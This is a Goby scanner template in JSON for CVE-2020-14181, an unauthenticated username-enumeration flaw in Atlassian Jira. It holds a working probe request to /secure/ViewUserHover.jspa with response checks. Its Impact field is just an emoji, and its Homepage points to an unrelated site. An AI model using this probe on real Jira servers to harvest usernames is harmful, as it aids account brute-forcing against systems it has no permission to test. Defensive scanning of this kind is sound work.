Atlassian Jira 信息泄露漏洞 CVE-2020-14181.json

{
      "Name": "Atlassian Jira 信息泄露漏洞 CVE-2020-14181",
      "Level": "0",
      "Tags": [],
      "GobyQuery": "(app=\"JIRA\" || title=\"System Dashboard\")",
      "Description": "Jira存在一个未授权访问漏洞，未授权的用户可以通过一个api接口直接查询到某用户名的存在情况，该接口不同于CVE-2019-8446和CVE-2019-3403的接口，是一个新的接口。如果Jira暴露在公网中，未授权用户就可以直接访问该接口爆破出潜在的用户名。",
      "Product": "Jira",
      "Homepage": "https://ones.ai/",
      "Author": "PeiQi",
      "Impact": "<p>🐏<br><br></p>",
      "Recommandation": "",
      "References": [
            "http://wiki.peiqi.tech"
      ],
      "ScanSteps": [
            "AND",
            {
                  "Request": {
                        "method": "GET",
                        "uri": "/secure/ViewUserHover.jspa?username=peiqipeiqipeiqi",
                        "follow_redirect": false,
                        "header": {},
                        "data_type": "text",
                        "data": ""
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$code",
                                    "operation": "==",
                                    "value": "200",
                                    "bz": ""
                              },
                              {
                                    "type": "item",
                                    "variable": "$body",
                                    "operation": "contains",
                                    "value": "peiqipeiqipeiqi",
                                    "bz": ""
                              }
                        ]
                  },
                  "SetVariable": []
            }
      ],
      "PostTime": "2021-01-29 10:56:59",
      "GobyVersion": "1.8.237"
}